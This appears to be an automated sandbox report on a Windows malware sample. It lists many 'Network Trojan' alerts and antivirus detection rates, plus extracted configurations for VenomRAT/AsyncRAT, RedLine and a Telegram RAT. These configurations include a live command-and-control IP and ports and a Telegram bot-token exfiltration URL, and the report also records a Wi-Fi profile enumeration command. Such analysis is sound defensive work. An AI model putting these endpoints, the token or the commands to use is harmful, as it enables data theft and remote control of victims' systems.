                      Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, ParentProcessId: 5720, ParentProcessName: 4336.tmp.Server.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 6348, ProcessName: cmd.exe
                      Timestamp:07/06/24-13:27:23.876923
                      SID:2019714
                      Source Port:49762
                      Destination Port:80
                      Protocol:TCP
                      Classtype:Potentially Bad Traffic
                      Timestamp:07/06/24-13:28:20.702090
                      SID:2054071
                      Source Port:49847
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:11.211434
                      SID:2054071
                      Source Port:49945
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:05.900230
                      SID:2054071
                      Source Port:49936
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:23.914512
                      SID:2054071
                      Source Port:49850
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:27.885798
                      SID:2054071
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:10.743030
                      SID:2054071
                      Source Port:49829
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:53.289576
                      SID:2054071
                      Source Port:49804
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:02.431241
                      SID:2054071
                      Source Port:49927
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:24.902744
                      SID:2054071
                      Source Port:49764
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:36.852023
                      SID:2054071
                      Source Port:49785
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:20.361652
                      SID:2054071
                      Source Port:49954
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:27.540890
                      SID:2054071
                      Source Port:49856
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:28.461699
                      SID:2054071
                      Source Port:49860
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:21.262339
                      SID:2054071
                      Source Port:49955
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:32.251129
                      SID:2046045
                      Source Port:49779
                      Destination Port:1912
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:21.524237
                      SID:2054071
                      Source Port:49848
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:51.211391
                      SID:2054071
                      Source Port:49909
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:16.324762
                      SID:2054071
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:26.543923
                      SID:2054071
                      Source Port:49855
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:50.321115
                      SID:2054071
                      Source Port:49908
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:39.235519
                      SID:2054071
                      Source Port:49884
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:26.055756
                      SID:2054071
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:58.992696
                      SID:2054071
                      Source Port:49921
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:59.602954
                      SID:2054071
                      Source Port:49814
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:16.854096
                      SID:2054071
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:10.180094
                      SID:2054071
                      Source Port:49944
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:45.171914
                      SID:2054071
                      Source Port:49795
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:23.256466
                      SID:2054071
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:01.558139
                      SID:2054071
                      Source Port:49815
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:58.182973
                      SID:2054071
                      Source Port:49919
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:33.931746
                      SID:2054071
                      Source Port:49873
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:06.260273
                      SID:2054071
                      Source Port:49821
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:32.180435
                      SID:2054071
                      Source Port:49870
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:58.758426
                      SID:2054071
                      Source Port:49812
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:32.392018
                      SID:2054071
                      Source Port:49781
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:40.242398
                      SID:2054071
                      Source Port:49790
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:30.555667
                      SID:2054071
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:46.868285
                      SID:2054071
                      Source Port:49901
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:31.385483
                      SID:2054071
                      Source Port:49778
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:22.166191
                      SID:2054071
                      Source Port:49956
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:34.995620
                      SID:2054071
                      Source Port:49784
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:26.898974
                      SID:2054071
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:15.166063
                      SID:2054071
                      Source Port:49839
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:31.071363
                      SID:2054071
                      Source Port:49867
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:18.885768
                      SID:2054071
                      Source Port:49845
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:14.320671
                      SID:2054071
                      Source Port:49836
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:17.072931
                      SID:2054071
                      Source Port:49842
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:07.617738
                      SID:2054071
                      Source Port:49940
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:49.444587
                      SID:2035595
                      Source Port:7707
                      Destination Port:49797
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:55.258520
                      SID:2054071
                      Source Port:49806
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:01.617854
                      SID:2054071
                      Source Port:49925
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:47.745851
                      SID:2054071
                      Source Port:49904
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:49.884185
                      SID:2054071
                      Source Port:49799
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:18.962369
                      SID:2054071
                      Source Port:49750
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:21.298450
                      SID:2054071
                      Source Port:49753
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:48.614243
                      SID:2054071
                      Source Port:49906
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:55.513329
                      SID:2043231
                      Source Port:49779
                      Destination Port:1912
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:24.804114
                      SID:2054071
                      Source Port:49851
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:00.774225
                      SID:2054071
                      Source Port:49923
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:16.102128
                      SID:2054071
                      Source Port:49840
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:18.009499
                      SID:2054071
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:03.274020
                      SID:2054071
                      Source Port:49817
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:40.168982
                      SID:2054071
                      Source Port:49886
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:08.134245
                      SID:2054071
                      Source Port:49823
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:12.583743
                      SID:2054071
                      Source Port:49734
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:12.148826
                      SID:2054071
                      Source Port:49947
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:43.297660
                      SID:2054071
                      Source Port:49792
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:52.930267
                      SID:2054071
                      Source Port:49912
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:30.242760
                      SID:2054071
                      Source Port:49864
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:38.134119
                      SID:2054071
                      Source Port:49881
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:19.523977
                      SID:2054071
                      Source Port:49953
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:35.333379
                      SID:2054071
                      Source Port:49875
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:56.461823
                      SID:2054071
                      Source Port:49917
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:37.697215
                      SID:2054071
                      Source Port:49786
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:09.898942
                      SID:2054071
                      Source Port:49828
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:18.447888
                      SID:2054071
                      Source Port:49951
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:13.509566
                      SID:2054071
                      Source Port:49835
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:56.133137
                      SID:2054071
                      Source Port:49807
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:20.471851
                      SID:2054071
                      Source Port:49752
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:29.539774
                      SID:2054071
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:33.057733
                      SID:2054071
                      Source Port:49871
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:36.461673
                      SID:2054071
                      Source Port:49877
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:23.256466
                      SID:2021697
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:57.914474
                      SID:2054071
                      Source Port:49810
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:23.136376
                      SID:2054071
                      Source Port:49957
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:41.186031
                      SID:2054071
                      Source Port:49791
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:33.258669
                      SID:2054071
                      Source Port:49782
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:06.742456
                      SID:2054071
                      Source Port:49939
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:13.975198
                      SID:2054071
                      Source Port:49736
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:51.556830
                      SID:2054071
                      Source Port:49802
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:04.543667
                      SID:2054071
                      Source Port:49932
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:23.876923
                      SID:2054071
                      Source Port:49762
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:56.977998
                      SID:2054071
                      Source Port:49808
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:08.993181
                      SID:2054071
                      Source Port:49825
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:38.523776
                      SID:2054071
                      Source Port:49788
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:22.525957
                      SID:2054071
                      Source Port:49849
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:09.320698
                      SID:2054071
                      Source Port:49943
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:54.727535
                      SID:2054071
                      Source Port:49915
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:25.683914
                      SID:2054071
                      Source Port:49854
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:04.964754
                      SID:2054071
                      Source Port:49820
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:39.422769
                      SID:2054071
                      Source Port:49789
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:34.133469
                      SID:2054071
                      Source Port:49783
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:45.086633
                      SID:2054071
                      Source Port:49896
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:17.944095
                      SID:2054071
                      Source Port:49843
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:37.292022
                      SID:2054071
                      Source Port:49878
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:16.276871
                      SID:2054071
                      Source Port:49949
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:28.711553
                      SID:2054071
                      Source Port:49772
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:14.852608
                      SID:2054071
                      Source Port:49739
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:17.117981
                      SID:2054071
                      Source Port:49950
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:53.883497
                      SID:2054071
                      Source Port:49913
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:04.101863
                      SID:2054071
                      Source Port:49818
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:55.591740
                      SID:2054071
                      Source Port:49916
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:44.196266
                      SID:2054071
                      Source Port:49793
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:50.711307
                      SID:2054071
                      Source Port:49800
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:52.431545
                      SID:2054071
                      Source Port:49803
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:23.978283
                      SID:2054071
                      Source Port:49959
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:46.086305
                      SID:2054071
                      Source Port:49796
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:09.169168
                      SID:2054070
                      Source Port:49731
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:13.245085
                      SID:2054071
                      Source Port:49735
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:11.609118
                      SID:2054071
                      Source Port:49833
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:49.445792
                      SID:2054071
                      Source Port:49907
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:32.441155
                      SID:2043234
                      Source Port:1912
                      Destination Port:49779
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:59.933231
                      SID:2054071
                      Source Port:49922
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:54.303209
                      SID:2054071
                      Source Port:49805
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:03.242661
                      SID:2054071
                      Source Port:49929
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:57.309123
                      SID:2054071
                      Source Port:49918
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:52.086477
                      SID:2054071
                      Source Port:49911
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:49.444587
                      SID:2030673
                      Source Port:7707
                      Destination Port:49797
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:48.899040
                      SID:2054071
                      Source Port:49798
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:02.399445
                      SID:2054071
                      Source Port:49816
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:29:08.461583
                      SID:2054071
                      Source Port:49941
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:19.823570
                      SID:2054071
                      Source Port:49846
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:27:37.717270
                      SID:2046056
                      Source Port:1912
                      Destination Port:49779
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:45.914533
                      SID:2054071
                      Source Port:49900
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/06/24-13:28:44.222149
                      SID:2054071
                      Source Port:49893
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VenomRAT {"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}
                      Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}
                      Source: 6.0.4336.tmp.Server.exe.190000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["{\"result\":200"], "Bot Id": "\"lat\":"}
                      Source: 4BC4.tmp.Client.exe.7244.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendMessage"}
                      Source: auth.xn--conbase-sfb.xyzVirustotal: Detection: 10%Perma Link
                      Source: C:\ProgramData\KMSAuto\accc.exeReversingLabs: Detection: 87%
                      Source: C:\ProgramData\KMSAuto\accc.exeVirustotal: Detection: 56%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].packReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].packVirustotal: Detection: 50%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].packReversingLabs: Detection: 54%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].packVirustotal: Detection: 54%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeVirustotal: Detection: 56%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeReversingLabs: Detection: 95%
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeVirustotal: Detection: 73%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeReversingLabs: Detection: 95%
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeVirustotal: Detection: 73%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeVirustotal: Detection: 65%Perma Link
                      Source: xj40xovMsm.exeReversingLabs: Detection: 70%
                      Source: xj40xovMsm.exeVirustotal: Detection: 36%Perma Link
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: xj40xovMsm.exeJoe Sandbox ML: detected

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: freegeoip.app

                      Bitcoin Miner

                      barindex
                      Source: xj40xovMsm.exeString found in binary or memory: astratum+tcp://us-east.stratum.slushpool.com:3333
                      Source: xj40xovMsm.exeString found in binary or memory: astratum+tcp://us-east.stratum.slushpool.com:3333
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3CBD.tmp.Installer.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile created: C:\ProgramData\134349\InstalledSoftware.txt
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile created: C:\Users\user\AppData\Roaming\134349\InstalledSoftware.txt
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49822 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49826 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49887 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49892 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49895 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49903 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49926 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49938 version: TLS 1.2
                      Source: xj40xovMsm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: ntkrnlmp.pdb3x, source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winload_prod.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: costura.dotnetzip.pdb.compressed source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002819000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
